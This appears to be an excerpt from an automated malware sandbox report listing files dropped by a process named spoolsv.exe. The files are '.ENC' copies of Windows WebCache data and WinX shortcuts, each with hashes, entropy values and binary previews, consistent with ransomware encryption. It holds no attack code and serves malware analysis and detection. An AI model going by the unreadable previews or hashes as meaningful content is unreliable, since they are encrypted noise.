                                                                                                                                                                                                                                                      Entropy (8bit):7.99966803607522
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:ewNgpfyauqgG5H1qWe6mpnYJd73upWLYbAeXvHYx1iKGso:lNgZBuqgG5VqW0Id/LYsO01rBo
                                                                                                                                                                                                                                                      MD5:74DC998780C4DC33F14F258AEF57E0A3
                                                                                                                                                                                                                                                      SHA1:D44E327FA09DEA35C6B814C95CA575B376472DFE
                                                                                                                                                                                                                                                      SHA-256:FC41A4B89D51B6AA32326A0E7DE5F0A8D2522931A90BE053F858CFAE8CC5318A
                                                                                                                                                                                                                                                      SHA-512:56889B0D3BE7D14BFF39B6025A340E7FB39CFC871F11FDAA4FCC20E9497A70F39383C929E2844495BEE55BBBFACED0322449BA0D3931BC6ABAA0D8574A98CDBF
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....o.8..3...GW ..Y...... ......WV.....5.......c[9...m.N..Q..R...P.\..-U(..qX....:...........:..N.T...l..c..K6.E:+.5..p#.........,W.V.5E.....<s.a.Y..RQ...50W..of.~.#-h..JL.T....y........1.s./.......A...}.X\..._.*r}...92%..}{...^..|.X..K.......j.C.......%.1..y.I.o.8...s0).....4[.]..:......d../.|....I...p.F.:WD.u.}|.xO`.9*.K4F..@b...9..s........H_................=........^..T...z.+.N.b..e..Mm...t$b.... m..3.X.SH..E.SRd.D..d.]g^.Y.4....~b~.....E."....Xl.8.3NqP.9..@.e...+.rdc..G....X1%(.....q(...U.Q.-Bt.4.mnI...yE..x J...r:d.TM.....'6f..{g@p.....2....g.| .e&....... .i..y8l.w.....u....;.D.........jje...n..=.b...............x..>..J..n.;''...X.6.WOO.h.j.Tx0.r.q....I..^...Sw{2S.d..(.hW....."...gU..fE.'.SM.p?......gj(..Y..j...h.E...X..'.....\o6a...S...p}^"...............X.&.th:......8#e...D.....I.V$..3!i.].f.>\;.X.x........8.,,.AX......6.T...Pd....]!;J.@..}.f@QG..CS..Cb..k...v=.....7......{..c{c.......j....e+...*.W,.y...^.....'.n..l...%._..y.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14680080
                                                                                                                                                                                                                                                      Entropy (8bit):7.999989596215368
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:393216:imPbAnGAOX1bP0h4M42Fi1dnkEWI+1kbj:i0MQPKLF4nfVf
                                                                                                                                                                                                                                                      MD5:CDF452D17BE2C2A17AD15C422BDB7BF3
                                                                                                                                                                                                                                                      SHA1:2C81542568A6E5D458607306158311944BF6B40D
                                                                                                                                                                                                                                                      SHA-256:622FF0BEBA8C5850CBE2763261046467474882A867731ABA075CF535E8844F4D
                                                                                                                                                                                                                                                      SHA-512:3A10CAFB0C07687CDD5F5C424798BF4FCCF4ACC2EBB5C6365DB1EBC6780F282868FE8872DDE69BC77EA0BC23584C257FAAF924F440E32FB58DA26CE5141353E3
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:...r,.....~......'.....f..v c.......~./.o....".g.u.l...IHeo..].8h..7>........AYn..F.a0.h..'..!..1i......>..^..S.o/m..q..~Y.3o..|"RP:.w...J.|..2.O:.Se%I.....6....q.....B.....N....O..1.......@.aO(kG.M...?..tD.......8:.h.D....u9.|o...3w.='.K.....B.;...$...n.......B....L..}.T..a..zg....8.{x....?.z...'.A#.5.8yW..uQB7....v=..n...!O..Ke..*...C.5.K].OI...u.E..xDn...-.ue!.h....@....2......(b....~....34.Hv.).....6...px..o..u.c..8....z..<.W..5hE.......D).%...Qv.k..Yy.....-...`7+.<.vs...(...L.#q.q..E1..............9+i .O.#.... ........pT&(.......A.X4V...fEh../[#!....O..^..mR...0..*j..e(*g..c..0~.....!I..N..\.P.....R..S.G..7|.u|..r.V?...]P.`p.d{.2...\.....>.B..i.33.<..s......r6.7.{....h...o....3#....i.w..W..v...|../0...........P'u!.:.........?C...".7!1..G.gLP..^...7...(.B..~..K.\N..+x...l^a.....!T|80.F=@=......Y.;w..MwP..H{g....o.:.|....`...-6F[.[.H...W%.h..@<vV{........@Eq.@l.(.5.L....&.A..~.k.....7..5[.-dtL.......N`._..o. .S.?.[.J0...[.!.+.L.J.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16400
                                                                                                                                                                                                                                                      Entropy (8bit):7.98941281638862
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:jUYgxgjWJFbjZ74kNvsXv+p7krQiCDFZjL+1pwL0U:jU4SNtKvm1iCTIpwLn
                                                                                                                                                                                                                                                      MD5:EE8D342BAF65820FE1A1A102CA0EA3D0
                                                                                                                                                                                                                                                      SHA1:D9F9F40E3763ED655989C1B4A2FDC1E9DAA119A4
                                                                                                                                                                                                                                                      SHA-256:55C6BC69F972A23ACEB6EA51B737757DD237CA48CF191C480FB0DB9E26F9DF68
                                                                                                                                                                                                                                                      SHA-512:2502C7ECA38BD240EAA8F8C71CA6C31D1C66B88158CCBF67D2FA3A72760577D5D387ED65D7A5FFE0218B512A32C82E396DD77D59D4EA12605C19B797B24AE16E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:B...\.B.K5....c..I..b...9E..;y....} ....o..I:.7...G#.H....\./Z..Y .w..".;&.ND.:.\....4..&......L...b.F....@.=,}.3Q...du.;..e.s.A.......m.*V..J.2.,<V\..\.`..:Q..p..ro../..Z..BIV1H.......(/.C..W.7*B,..%c.=....>....V..\N(.~....Rr5...?k..#....=L...............-..`:g.?Ef.....V.?2.V.1.j...>_..u...G...mJ.C...Q.&.D........O.'{.....(.+.g+.@...\.Le.x.k.}..C....H..v.uJ..gum..G.o.u.O.`...O.i......w..G.LR.Vu\P......2.C.o.....`.ygI=..8....=Qs.7t.Aj.u..WfR.%T....m/.Cn.....q..Y....\.2aH.CL...)...8uYJ........^.W.."z.S..8d.!s9..w..V.R.j....a.....l.q('...=..d.Bb...G<M...9....p.]....5....v.k.M1[.&Q.m.K.&..q.##.. ...~..}..f......-...|.(.......Xc......t...b.f.N....F...zh..<3.*d.@./.f.\T...@C*....H...*.|.x...R/$....F.3...j.....s...$..eF=d..8d3.j.Z.....t.....C....,...AU....v..n...X+...=P~....2{...K......,.(l#KS.)...qi.N.%.G.@A..d'..li...I0....$....,.e..Vq.......2.......!...H_...ng..X......J..O/Z.....3.c8..$16hN.......X .5....E........d.n.W.....NN.u..li3w...>.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1120
                                                                                                                                                                                                                                                      Entropy (8bit):7.838507241461316
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:IbncC3i9dJKyXmADs6L5p6v0NJ2ASYNXPPSzHhd1sU1aHExG6:IbnRiDD5VUqJdPmj1sUUHExG6
                                                                                                                                                                                                                                                      MD5:28891DEC80F60092C74DCA566F2F0851
                                                                                                                                                                                                                                                      SHA1:B4C051B047323D447161E088EDC1D6E4F5950428
                                                                                                                                                                                                                                                      SHA-256:37C254117A33F38FDAEC37C42291A961B3625C95C67CA14BD991A026FD84AF81
                                                                                                                                                                                                                                                      SHA-512:6C173A4A730D9076DA741899EAA34BB7F24A51DAFAF1A8D9F77FCC40B0E8516108A5FFC38B0865CC998072896A7680E48E5874C30A1AA233E35002048C0E54D3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.Dd..9.LA...TC ..z.6.e..p..gN...>...4...>......W.q Gr..C|.._...sb.B..e...=.<.*..........-../..Uk^.;.VOvw.^g....._.lB..z.pK.l>..M.AR.Kuf....L.+.~.(.:.............c.../g...t.h`..x.X.g=.k{..`..K/...GS.m..b..*..7.6............a..m......=.Y..{:Ci ..4....s.|m.&'1...~5.....'[..KU2mi..&.i..5Vw.W..r..q...m..`@.L.......p....9..6.AcZ.....v.q..1...(.Pl.Dv....F..%...@@...;..;.K..'......;=.?...(...<...2.........kf.c&...].<oy..n.H.[N..PQ_.l.uP/6S.e......g.7...:.}.8o..A...|u.p.#E<.....P^^..l...g_..'aU.!.....f...4..U./:K..c..........7...~.^\]..t.!....H......R;......C.g.._...:..V5.d.[_(.z..z-.[....k..u\..r.3.YFfx.j:6...+.x*t..oDX.....0'^......c..)..gU.W.O..^.{....e..F..w..8....T".3".$.."..Y^.q.. (.....ak)W....i9.5Q?&sN...!..r.....41f....A..w..g....6..O......^.O...#.e (.%m^..}"..tz.......=....J..........8..iBw./.,v.........#..S|...\..g.>3..Q...1N... <P]......&.X.....b...R.A`.M.[bQ..j........gD.[)..&.K#9=.r..5.(....q.Mh..}7W.96|...z.V

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):5.996928094887359
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:ohhrNuPZHaDFMMBoLgvjn:o3rMHsMMBvj
                                                                                                                                                                                                                                                      MD5:0C9F2258B625F9146387CCABEB57CDEE
                                                                                                                                                                                                                                                      SHA1:A2BC4B2D0F96D302D6B38541931B6727AE00340E
                                                                                                                                                                                                                                                      SHA-256:2712E484E07C89F354240F99112BAF36A9EB14FA742200E927721EB87C7477DB
                                                                                                                                                                                                                                                      SHA-512:9DEBE9D4A00D9D225E219B843F0DB24440850147123C69BAC4D9B2EC0BCD1FC2B225F3BC4248882CACF0DF91A23BAE8E8ABA536C65E0D8A2C679634C8E6AC838
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:U8D...2..9.*y.X.|K\e.YF*...4...g.=g.n...u....t..H.2....M.."..7.....=\.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1120
                                                                                                                                                                                                                                                      Entropy (8bit):7.829966722149672
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:IbncC3c95a4K+Hdkjamr9zcplmBUWUniy7VoHp5iThoz1/kUmJZsCRyb4f3n:IbnRiRK+HCmmp8LRniy7Gvi9oz1kXsSn
                                                                                                                                                                                                                                                      MD5:D5EFF2E2829E8C0332947A4AC2E39536
                                                                                                                                                                                                                                                      SHA1:7A7DA2248A99FA798AFFE435301C54BBA5FE76DF
                                                                                                                                                                                                                                                      SHA-256:3E6DD0E0AC62F3189B9388DD0D5568DBA7BB9EB6F378E3DA96EFE52DD5CA50C9
                                                                                                                                                                                                                                                      SHA-512:2A4395E70329E4C0044D5E2835C05096EAEE7FEEF450E3FE0A5CBB50403AE518BA6A283797CAD945120DF26DB70D0BE57D7AD94ACA4D4F91ED58F30B716D9528
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.Dd..9.LA...TC ..z.6.e..p..gN...>...4...>......W.q Gr..C|.._...sb.B..e...=.<.*...[CPX.;W$.G.;r1LK......z.hB....o(7..r>v....e .....Z~XwG.M....S...{Q7(....l.........<&.........}T...pG..X..?......`U?.4..|w..x....L..4......./3......-..k....?..P...|.z.......h......9.$....L....S...r....U.'...2...q!x...n..D...|.JF...p.>.]..Y.k]..O.B..aC.....<.u....`2....fI....!X..}.X-.).W.1rf%........SN..*W..k.X.....*0..*....L.ln2T.f....%U......:.U5.a.s.r.K..22x\.z.g3..Z.'.yK.....w....o...... .$yMr.J......N.....'._.to?...m,.......W'.U..g=D.....Q..)P.#...[.....v2^......O..ikE.uY..F.;.....e>.}'..mG\.>.._..(..U.<.!..._.o.E...l..6X...K.Ko...r..C.......'....../.......^.|..............hL..QH-+'#.....a..;...$..)......t,Q..zEf.)..C........B.)J..:...sa.M...R.F..s.@[..s.:c.n..r....M.m._....1U...^.H.8........a..!. ..v.].....AJ\...F8tDKU..J....c@%lT.>..C...U./.g.......... .9..}s....5qi..k._.V..t.N......o.}.@.xv.......2..N......Nj......l.Z..#,..J.".

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1120
                                                                                                                                                                                                                                                      Entropy (8bit):7.81702153412515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:IbncC3TPTEnY3zld8FdTP8LvRKycxsh1/OrYmtSLCIZ8uTbfaJnL9o:IbnRTPTSk8wrR2QNDZtTbgL9o
                                                                                                                                                                                                                                                      MD5:11FEE20454901007DD2B7BDFF7A30E0E
                                                                                                                                                                                                                                                      SHA1:3FB4328F7BE2D2D7EDF153B9E590CCF470E57277
                                                                                                                                                                                                                                                      SHA-256:2BAA63323F5C1482E9153E2E5ED2383CDB6B4263A1C595236C24ABE34584064C
                                                                                                                                                                                                                                                      SHA-512:68812FE4EF99E8243A5B8FBBA9563A7CBC779671774FA8975350546476BCED0DF759EF71F724C4D79EC5A40101C47078B3B79566F8987EFB06162F4DED56890F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.Dd..9.LA...TC ..z.6.e..p..gN...>...4...>......W.q Gr..C|.._...sb.B..e...=.<.*z0.1..Gj.....C.]l ...*.#;~..\.....+X..$?.....sa..#......7$.9..jR...fz....4y@A..[.b..p.,.D.-.[.j9........7.B...e.y.....`.@.12<.%...mJ...]..x..nY....H?1.^n...r...`...m4.nz.....R.~...J..d.:..-._.w.t.p....~Sk..[<}........|jJ...^k.j.......QB.4..H..+C. y.........b..a.". .x.{.A'...Ll......(.%*...q...!T}.D.......'u.s...DY-.f.s..>..?#.T...........~$..v....m.N&...-F..J..........%.!Kw.|7..OT.X......3b..A.'x......".7.......].....h('.x.........u.is..$.....N.K..hh........R.....L5... ...O.[.U.$...v....Y..KV....t.....@ID..CX...:bD....7.C.{H..b......W_.,...@........|.X..(....8...t....m.DFk.x}.......z;.1Wb.L.#...G..o..@GY........$s1.:..M...>|V.t...Y3.p.F..p..w...X4..&".Ml..0[.v...VK<0>_.XM6..3.(m.(S.......]1...&[x....Y.W..en....pW6...;.~.)3 E.i.[..h.K.."....V_.../.V.jc..K>..T@...4.}..3..........Q|.....k[....eb.F....7A.J[!x"bz..A|..Q..k....;}.`%/_l...8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1504
                                                                                                                                                                                                                                                      Entropy (8bit):7.873782741380363
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:IbnYnj862F7h4CSfMyBUjn3La9yHipu9de8yUKzNMzpfWI42SGWnevpyuUZMPaOz:IbnYnj07h4CYMy2rGQCh8yTzNMzs2S70
                                                                                                                                                                                                                                                      MD5:1FA0482929805039CAF221DB00C24ABE
                                                                                                                                                                                                                                                      SHA1:D889AE7CA8C018FF0B7494DD4D788FC1D95DEE02
                                                                                                                                                                                                                                                      SHA-256:884C530C3937E38489F160BB2636C538FD4B8EC0FE7575587A6A53287ED4CFC4
                                                                                                                                                                                                                                                      SHA-512:10B65EDF165E01D0132A947067295F6A32C9CE9D185942C576FE0986B72BD4713A79B030B2E111EF2AFDEC9461FBBB7BB2C31A1D11C0A5069E0B91922EAF81EE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D...r.gmK2.......G...N.n.`;...qk...jM..x.....X.....=.d...A....5..n...A.k(x.r>..8(Ig.bN...........,..#D..KM.)%...1.9Q..{l....i....xCrajy..K%....z....}n..wT}..f..hCl...!..2_-....!p.{.^..%......}=.q................^3.+..X.I.....O...B....C.A{.b.G.9.AW....w.T.q....F.....l...L..{.e\z.....;.a.....<.i.R......[Y!$?Z.S.&..n....^'$K,...SM..K.....p<.U.k....&2q...PW....&....I.a.. .7....:%.%aT..j.$zc`...W.*.K..w..D.............KS.@4.M.z.*.....{.a^..J....n...f...;P..*.:'..3._&.p...>..m...|Y..w./.`v7..`~.b.......+.....m.n!.qg.L~L..{/]..'.d4..7T....r..i.K[>.A....W..O2.?.O.......w.".p.......l..<.]..e,...............V.b.^0...ZG.=A..H....N........q.8.1..e...0..u...._.w`.r....eMo..u.%.....Z..|....x.u....?.m...9...X..^.lj+.;....)....zv...&.......f..>t?.h......"..od.\.D..4...........|.c....y...q0.>c.R.b9S.J0...|.ouE.\".w'.w6..........7R7.g...(...^..'_t.........>C.2.... ..V=...J...g.....?..m........'b>3...V{...+Z..E.p..Ec.P.|a.S...)..%...x8.....S..u

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                                                                                      Entropy (8bit):7.8162541486732175
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:IbncCCABmbRl/gtTvF4hJIGT/IJzI722fYganIltd/ePyT1IswUC9:IbnoABUD/uTvF4aGcJz3gtqyRl69
                                                                                                                                                                                                                                                      MD5:C887EE70D30F2F2951FD3CAD1C4A2D89
                                                                                                                                                                                                                                                      SHA1:41E882769B4CC1E495D0B389FE47145B05C0F18A
                                                                                                                                                                                                                                                      SHA-256:3EA69ABB28674E4B278CF7E4B3813EE2FB4AC869485E727E69761D9AEC65A494
                                                                                                                                                                                                                                                      SHA-512:5D6A5E89F77BA21D06A2A2A3E676A6B35448F03FD4CEB9F8FE21C900C11F9485AD79BB1BAE1510CF70F99307EEA2F0E5A6EA0F977933A00DDE3940C3E3695F01
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.Dd..9.LA...TC ..z.6.e..p..gN...>...4...>......?..........M..T1.....F......s...@t.} ..@X......`~.Lf.-.w.....w......P$<<........*...T(..Yg...;......}..m......{.9.V..m<.[}...-."<E ?..ic..e........T$..T...S...5...G..u.....=n....Z.O..~k..N..P....G..x.T...v.>..Bg...z2.b.[dN....p.C.>P.(.dx.1pX,UY.s.J.K2Q..e...vg=/.... ..q.i..m..f.......%...&../..>...(..Y.....4....X3..p........G..}....$..l.y.o~U.c.....m...o.L].......P....'.-.M ..n.8...Zd9-Kl....N....ix...H..i.>....x..i.:[....Uz..%..%py.........s...cC..>j..w.L..+4..I.LcO>....w.m.Z.D..}..&.B.|=>.F-,..*."..,.n..Fb..f...../.P.a.U..u....{F..^z.P..)......=.._..v%......*.ld......iw.?......+..Sns...c^;.%..&i..._.....An..[.e...%+.n..5..&...=}..Q....[I".7...b.bY ..n.FR..>-5.=.F...r.4..VW.........W.$..<.TK... $).....d.[^....^..kQ......s...^.`...>..T1P.QuL.Y..h....F.p....r. ..E/...W..&...k...yx.?\=Ic.w....Ge......M..,..n.a...E.....9.ffAZ......4&;..".}.....PI.9.....6.I.....R.{h........)Q....7.k..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.440258680032534
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:o3rXvzYc+HnreymOPUaHw/g7T7AZKIFo0B0+3imT6bT:oDvzSHr/mO8amgZhEFT6bT
                                                                                                                                                                                                                                                      MD5:181C6E175ABF77F08AF6EAD4139FE81F
                                                                                                                                                                                                                                                      SHA1:452B322E9B99DC51A8B3F70264B2DACC39E93AF4
                                                                                                                                                                                                                                                      SHA-256:BDE93E72205C92C9399FFA75AC54D7803423145CA02F0A8A2B6C424346320AA5
                                                                                                                                                                                                                                                      SHA-512:01DBA18B772D84535981459B42546FA7FC3E41065923395E490FDA1554564A5995306427AFE1BE95E391C5FC1218429C6B52A5B157F7FDC4C44F1C991CADCC26
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:U8D...2..9.*y.X.l.'.........S..A.YH]<gK....h...U#.....s.Z..>D....m...^.@J..LJ...{.(>OP.u"I>(..Wz...jU...q..7Y*]jJ?".3.`8-k.O....^!.>../~.Lj....$.v.....C..Dn.A6..0L.......h......M..?.6rB....G....*...%|T.7QK.'........d!R.s..x.o..6.<...T.....E.iS../..s..Z.d_.............R...r......&..x0.v% ....m..W..d...P.......B?|M..I..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1136
                                                                                                                                                                                                                                                      Entropy (8bit):7.808936895815623
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:IbnatCfulU5AiRACHI1BLCuHlGm8C4PhouIQfI4RxXFroyFO4WfY8DBnNo8TiDRn:Ibna0fdA4xI1tlG44PhokfrRxXFcy04B
                                                                                                                                                                                                                                                      MD5:31C079A0EE094AAFC30D361AB56BDA03
                                                                                                                                                                                                                                                      SHA1:9B2179FB8E79D785535E96952328C376EA06F739
                                                                                                                                                                                                                                                      SHA-256:20C3741F05EFCE6F663718022BEE2D86FB1C573E0FCF5F669331070F43B3D109
                                                                                                                                                                                                                                                      SHA-512:22C178DF10CF6B7A31CABF2E450BA7AE3ABA061907C323E9B858D99B1AB8046A20C0F569FFD15C45C3904650CE9C09AB744CBF45DCA22E837257F4CAD559E1D7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D...`.pfQ$,l.2(.K::...g.5R..7.......QiPv.k........E.....q...`.<jB..ws.#.<..5..k...<`Ri' .m.?....:..L..$.......Pc.*2.....&..:....;.]3d....z.tL,G....t.(......[N..6......-._....r.q.>..<..>..+....h,...^.`.N.z...V...71.....+..!...p...d.......RP/...."...5.......]. ....c..22..m.'..l..D.E...M...\.....|.Z....{s..x3..:a...._y.u...a......:P...$..e~OM<A.i`V.o..{o.3f.m.i.:9...]..~.Y.F....2.....s-....+.[.D".z..9.I ..V..&.....a.;.d..4.3.>....$.....;$N.a...3T.>....t]..tI....rT..N.Xg.W.:...4./..(.Y.j'=c.]o..x....$.?u.9.->..jX......%.&.>.9:.>g........gt........P..[2..K.P6...?....`.].E.!-=:..$.!.Z...k....h..(U4,..............+...'14q.V.g.W....x.~.R.....dQ..g../dXM..9.d.W.5h)@8......2#..,..j......i.7>a9b...Q. ....J[@....."68b....u.".).;.i.?...u......Yxv[..s..X.R8.mO[.I.FI.....H][..X..7..-....&.0....'.....S,_.sns.e..oF(.r..X..:..z......5C3.u.g."B....e.&C.u....X..d.B.F./.u{..@.]>...d1.....x@#...f.Y._....Y.~..XA.......P...t...s.H.aW...TkkFe6k/o='

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1184
                                                                                                                                                                                                                                                      Entropy (8bit):7.837218405651641
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:Ibnas/pXIaxexbSAOp1CgjmHD2KyLsuT3Zxcq4DoVUE/JcbIUMqvVd4s:Ibn16axeopPKmsuNxcnDFE/eHrvVOs
                                                                                                                                                                                                                                                      MD5:61CEAB08F8BDB6817EBCB3C5B11C5675
                                                                                                                                                                                                                                                      SHA1:09FD44CF89E68DAB6F64288558B616CF1F811D4B
                                                                                                                                                                                                                                                      SHA-256:80277971DD0454B9B8F258FD4E53A4F895517182BF6B4BF91FA4563CF00499D6
                                                                                                                                                                                                                                                      SHA-512:2C6B0B358C5F31EE7CC2CBFC7A9D902E45A3E93882C25B848BF0FE917B2D9EE5DA529BE576CF2160198F31E65F809A45AA347E61233E9FE96F2686FDEDB2228D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D.K-...zw.v.L."v(1........k.W.....Bv..R<.-..1.A.o[...})..:Z.......,].Y.z...7...M...{......$..}"I.w..rE..q2.y..r`...7Yy...F..[.y.I@.....!9.}.-..r...Ln5g..&..k3..~.W...u....?...}?.%...*N..)...2x=..]H".;".).....B......C.E(..........=........a.*.....(.....g.=......t.@..|.4..u...1.....6........&........+Du...e.b.X..........wL...C.z.a...NhYM.........Ca7?n...'s.@..|...W..>.bqv!...?b{...}...-4F.r......Z..EQ_....Mi......y..8X$S./Td...In&.L..x.....h...=\Fw._eK.k...y,...:..^....P.nW.}9%.>,M......tV..iQ.....v...|.?....#m..W..7D.[ .......[.q7.?..a.}K..].{..mb......N....pg.eu.^.d...._>...^ w...L...E...DT<K.B./....b.H.~6...'........*..&.....Hq.y)..i..6.%.p.%q ...$H..)....\..K:.8.... .3......? .Y......X..s......!EU...w.9.9...g..I.(3I.....B.-.k.....l.N...Q..=...Lb......2C,.U.w.M.".H........._zv.Q\...^....6...Jao..r.{l9\...#6..g.........^....F........E..!J.M.....V.C.l...+.e....m....'..*.........I.g....G...U.i|.m...,..]i*b.B!..A.(ME#...ol.R'

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                                                                                      Entropy (8bit):7.817335070327029
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:Ibndc5RTrOAn4n6Do3sXJY9z9WKE4xGBSKu6Z+0Xn:Ibnd8QAn4eXXOPWKE48BSKnHn
                                                                                                                                                                                                                                                      MD5:C9E32FE9F6540DA1211BCA909043F86D
                                                                                                                                                                                                                                                      SHA1:7AF2F54A0F5DD54188A8DAAEBC4CFA5AD3EA6807
                                                                                                                                                                                                                                                      SHA-256:D396F4BD971403833CD1E7F2A6913C82C4DAA883CC47902395658EAD72DAD812
                                                                                                                                                                                                                                                      SHA-512:F4A24C8810571E87164B651034D5BB6175E8BD7B65859FE75319405107F37F4C63DEBE2F899EBDB37436705B0A6041B8996601262C2A98F1141567B851105D14
                                                                                                                                                                                                                                                      Malicious:false
